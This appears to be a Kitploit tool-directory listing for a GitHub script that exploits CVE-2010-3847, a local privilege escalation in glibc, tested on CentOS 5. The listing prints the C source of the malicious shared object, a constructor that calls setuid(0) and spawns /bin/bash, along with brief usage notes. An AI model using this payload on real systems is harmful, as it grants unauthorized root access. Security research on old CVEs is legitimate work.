Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2010-3847 — Script to take advantage of CVE-2010-3847 | Kitploit
Tools/GitHubGitHub/magisterquis/cve-2010-3847
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary ExploitationArchived
GitHubmagisterquis/cve-2010-3847

cve-2010-3847

Script to take advantage of CVE-2010-3847

View Repository
39 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2010-3847 script

Meant to automate the exploit discussed in [http://marc.info/?l=full-disclosure&m=128776663124692&w=2]. Tested on CentOS 5 x86.

The DSO it outputs is compiled from the following code:

root@kitploit:~
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
   setuid(0);
   system("/bin/bash");
}

Usage

Download it, put it somewhere executable, and run it.

Gotchas

/tmp and wherever ping is have to be on the same filesystem. If not, adjust the paths accordingly.

Download Tool